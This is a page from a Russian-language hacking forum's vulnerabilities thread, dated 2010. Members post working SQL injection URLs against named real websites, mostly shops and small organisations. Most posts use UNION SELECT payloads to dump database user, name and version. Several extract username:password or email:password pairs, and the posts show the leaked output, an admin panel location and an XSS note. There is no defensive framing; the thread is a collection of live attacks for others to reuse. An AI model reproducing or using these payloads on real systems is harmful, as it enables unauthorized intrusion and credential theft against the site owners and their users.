ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11751  
Старый 31.03.2010, 04:24
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Код:
_http://www.zonebbs.com/boards.php?t=10+and+%281,2%29=%28select+*+from%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29x%29--+
5.0.51a-24+lenny2-log
Код:
_http://www.blindbargains.com/boards.php?t=66+and+%281,1%29=%28select+*+from+%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29x%29--+
5.0.89-community
Код:
_http://www.glaciergaming.co.uk/gg/boards.php?t=list&rank=Queen%27+union+select+1,concat_ws%280x3a,username,password%29,3,4,5,6,7,8,9,10,11,12,13+from+onecms_users+--+
Код:
_http://www.thatgamingsite.com
Форма поиска ->поле name=search
Код HTML:
%' union select 1,2,concat_ws(0x3a,database(),version(),user(),@@version_compile_os,@@datadir),4,5,6,7,8,9,10,11 --
В самом низу!
Цитата:
elven6_TGS:5.1.30:elven6_Mehar@localhostc-linux-gnu:/var/lib/mysql/

Последний раз редактировалось Strilo4ka; 31.03.2010 в 05:05..
 
Ответить с цитированием

  #11752  
Старый 31.03.2010, 12:56
Аватар для z0mbie86
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
Провел на форуме:
71531

Репутация: 0
По умолчанию

определил сколько таблиц но всё равно ничего не получаеться:
Код:
http://www.platinumloops.com/detail.php?prod_id=182'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
 
Ответить с цитированием

  #11753  
Старый 31.03.2010, 13:37
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://shop.megabug.co.uk/products.php?cat=96+union+select+1,2,3,concat_ws(0x3a,1111,user(),database(),version()),5,6--
Username: megabug_admin@localhost
Database: megabug_shop
Version: 5.0.90-community

Код:
http://www.fot-on.com/files.php?cat=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3--
Username: myfoton@localhost
Database: myfoton
Version: 5.1.39-log

Код:
http://kerkenaships.com/catalogue_ar.php?cat=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version())--
Username: kerkena_root@localhost
Database: kerkena_bateau
Version: 5.0.89-community

Код:
http://newyorkquilter.com/gallery.php?cat=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13--
Username: sewingandbeyond@localhost
Database: sewingandbeyond_com_maindb
Version: 5.0.67

Код:
http://planet-bison.com/catalogue.php?action=cat&idcat=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5--
Username: planetb@localhost
Database: planetb
Version: 5.0.44-log

Код:
http://www.otten.it/prodotti.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),database(),version()),12,13,14--
Username: ottenit_user@localhost
Database: ottenit_main
Version: 5.0.89-community

Код:
http://rentakran.kz/ru/catalogue/category.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
Username: ltech@localhost
Database: ltech
Version: 5.0.89-log

Последний раз редактировалось root_sashok; 31.03.2010 в 14:03..
 
Ответить с цитированием

  #11754  
Старый 31.03.2010, 14:05
Аватар для kori256
kori256
Познающий
Регистрация: 07.02.2009
Сообщений: 89
Провел на форуме:
3029180

Репутация: 106
Отправить сообщение для kori256 с помощью ICQ
По умолчанию

Код:
http://www.cobavin.com.br/imprimir.conteudo.php?id=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15--


Username: cobavin@localhost
Database: cobavin
Version: 5.0.90
 
Ответить с цитированием

  #11755  
Старый 31.03.2010, 16:55
Аватар для Neset
Neset
Новичок
Регистрация: 30.03.2010
Сообщений: 1
Провел на форуме:
20309

Репутация: 0
По умолчанию

http://www.freefromfear.org/true.php?id=213-213%20union%20select%201,version%28%29,3,4,5,6,7%2 0--


Код:
http://www.freefromfear.org/true.php?id=213-213%20union%20select%201,concat_ws%280x3a,email,password%29,3,4,5,6,7%20from%20user%20--
Мыльник:Пасс =)
4.1.20-log
 
Ответить с цитированием

  #11756  
Старый 31.03.2010, 17:55
Аватар для b82a
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://koleso-russia.ru/index.php?ob=news_one&id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8%20--+
User: dbu_koleso2_1@192.168.8.96
Database: db_koleso2_1
Version: 5.0.77-log
PR: 5

Есть таблица Users с колонками login и pass. Админка тут - http://koleso-russia.ru/admin.php . В акциях в полях "Заголовок" и в самом тексте xss.
 
Ответить с цитированием

  #11757  
Старый 01.04.2010, 13:47
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Код:
_http://acutecp.rediscussed.com/?p=-3%27+union+select+1,2,3,4,concat_ws%280x3a,username,password%29,6,7,8,9,10,11+from+users--+
web_settings.php
PHP код:
...$result     mysql_query("SELECT `id`,`page_title`,`page_description`,`page_keywords`,`page_content`,`page_status`,`page_views`,`page_created`,`page_last_edited`,`user_created`,`user_last_edit` FROM `content` WHERE id='$p'",$conn) or die(mysql_error());
$page_result     mysql_fetch_row($result);... 

Последний раз редактировалось Strilo4ka; 01.04.2010 в 14:31..
 
Ответить с цитированием

  #11758  
Старый 01.04.2010, 18:25
Аватар для Keltos
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://pgroup.ru/?a=news&id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(user,0x3a,password,database(),version()),0x55),0x55),3,4,5+from+mysql.user
Version: 5.0.67-community-nt
User: root
Database: dprofit5
 
Ответить с цитированием

  #11759  
Старый 01.04.2010, 20:30
Аватар для b82a
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://tuile.ru/more.php?do=more&catid=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11%20--+
User: gutter_tuile@212.193.229.91
Database: gutter_tu
Version: 5.1.41-log


Код:
http://www.vcspartak.ru/index.php?lang=ru&id=-1%20UNION%20SELECT%20concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2%20--+
User: vcspartak_mysql@10.1.3.44
Database: vcspartak_db
Version: 4.1.22-log


Код:
http://www.savatouristik.ru/index.php?mid_open=7&id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29%20--+
User: client304@localhost
Database: savatour
Version: 4.0.27

Последний раз редактировалось b82a; 01.04.2010 в 21:34..
 
Ответить с цитированием

  #11760  
Старый 01.04.2010, 23:29
Аватар для BrainDeaD
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

Код:
http://www.sacvoiaj.md/admin/main.php?id=-1+union+select%20+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8%20--
database: 18831
version: 5.0.77
user: 18831@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ